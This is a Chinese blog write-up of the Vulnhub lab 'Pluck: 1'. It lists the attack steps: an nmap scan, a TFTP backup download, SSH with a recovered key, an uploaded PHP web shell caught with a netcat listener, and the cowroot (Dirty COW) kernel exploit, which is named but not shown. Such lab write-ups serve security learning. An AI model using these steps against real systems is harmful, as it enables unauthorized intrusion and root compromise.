Pluck: 1 in Vulnhub

廢話少說,直接開始!

$ sudo nmap -sS 172.16.89.130

瀏覽器打開網(wǎng)站發(fā)現(xiàn):(注意url)

繼續(xù)~~~~~~

$ tftp

tftp> connect 172.16.89.130

tftp> get /backups/backup.tar

Received 1824718 bytes in 0.9 seconds

tftp> quit

解壓后得到文件夾:home和var,進(jìn)入home/paul/keys后

$ sudo ssh -i id_key4 paul@172.16.89.130

因為在網(wǎng)站上看到了admin登錄頁面,現(xiàn)在看是否能寫入一個shell,去下載shell文件

PHPshell

修改完shell里面的信息后,終端選擇Edit file并且寫入文件shell.php,然后退出

$ nc -lvp 4444

瀏覽器打開剛才的shell.php

發(fā)現(xiàn)shell回彈

? cd到/home/paul目錄,發(fā)現(xiàn)文件.pdmenurc,聯(lián)想到在/etc/passwd文件見到過/home/paul/pdmenu這個路徑,那這個應(yīng)該就是ssh鏈接的時候的那個界面的配置文件,但是現(xiàn)在用戶www-data沒有權(quán)限修改,因此再次回到ssh鏈接上修改。

之后退出,再一次ssh登錄,發(fā)現(xiàn)多了shell:

點入后,可以看到用戶paul的shell,去尋找exploit : exploit

建立一個新文件cowroot.c,并把代碼寫入。


依次執(zhí)行下面命令:

$ gcc cowroot.c -o cowroot -pthread

$ ./cowroot


bingo,flag獲得結(jié)束!

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容